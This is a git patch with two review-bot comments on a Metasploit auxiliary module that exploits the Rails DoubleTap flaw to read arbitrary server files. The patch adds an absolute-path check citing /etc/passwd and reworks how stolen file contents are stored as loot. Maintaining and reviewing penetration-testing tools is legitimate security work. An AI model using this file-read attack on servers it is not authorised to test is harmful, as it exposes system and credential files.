From fd4c70d0d4d9d9aa40fa370d3458bb1aa19d71dc Mon Sep 17 00:00:00 2001 From: cbrnrd Date: Thu, 28 Mar 2019 22:49:07 -0600 Subject: [PATCH] Clean up loot add and route checks --- .../auxiliary/gather/rails_doubletap_file_read.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/rails_doubletap_file_read.rb b/modules/auxiliary/gather/rails_doubletap_file_read.rb index 73fcdbbfac..6f697994b3 100644 --- a/modules/auxiliary/gather/rails_doubletap_file_read.rb +++ b/modules/auxiliary/gather/rails_doubletap_file_read.rb @@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary print_good 'Target is vulnerable!' return true else - print_error 'Target is not vulnerable.' + print_error 'Target is not vulnerable. Make sure your route is correct.' return false end end @@ -89,6 +89,11 @@ class MetasploitModule < Msf::Auxiliary return end + unless datastore['TARGET_FILE'][0] == '/' + print_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)." + return + end + print_status "Requesting file #{datastore['TARGET_FILE']}" res = send_request_cgi({ @@ -105,10 +110,10 @@ class MetasploitModule < Msf::Auxiliary unless res.code == 200 print_error "Failed to read file: #{datastore['TARGET_FILE']}. HTTP error: #{res.code}." print_error 'User probably doesnt have access to the requested file.' if res.code == 500 - else - print_good 'Response from server:' - print_line res.body.to_s - store_loot('rails.doubletap', 'text/plain', datastore['RHOSTS'], res.body.to_s, "rails_doubletap_read_file_#{Rex::Text.rand_text_alpha(8)}.txt", "File read via Rails DoubleTap exploit.") + return end + print_good 'Response from server:' + print_line res.body.to_s + store_loot('rails.doubletap.file', 'text/plain', datastore['RHOSTS'], res.body.to_s, datastore['TARGET_FILE'], "File read via Rails DoubleTap auxiliary module.") end end
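Review bot: The new guard in the second hunk, `unless datastore['TARGET_FILE'][0] == '/'`, raises NoMethodError instead of printing the intended message when TARGET_FILE is unset, because `nil[0]` is undefined. Whether the option is declared as required is not visible in this hunk. `unless datastore['TARGET_FILE'].to_s.start_with?('/')` covers nil and the empty string and states the intent more directly. The enclosing method begins above the hunk, so this note covers only the added lines.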
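Review bot: The rewritten `store_loot` call at the end of the third hunk still passes `datastore['RHOSTS']` as the host, which is the raw option string and may be a range or a list, so the loot record may not be attributed to the host that actually answered. The module calls `send_request_cgi`, so `rhost` is presumably in scope and is the better argument. The return value is also discarded, which leaves the operator and any later report without the saved location. Suggested form: `path = store_loot('rails.doubletap.file', 'text/plain', rhost, res.body.to_s, datastore['TARGET_FILE'], "File read via Rails DoubleTap auxiliary module.")` followed by `print_good "File saved to #{path}"`. The method starts above the hunk, so whether `res` is checked for nil before `res.code` cannot be confirmed from here.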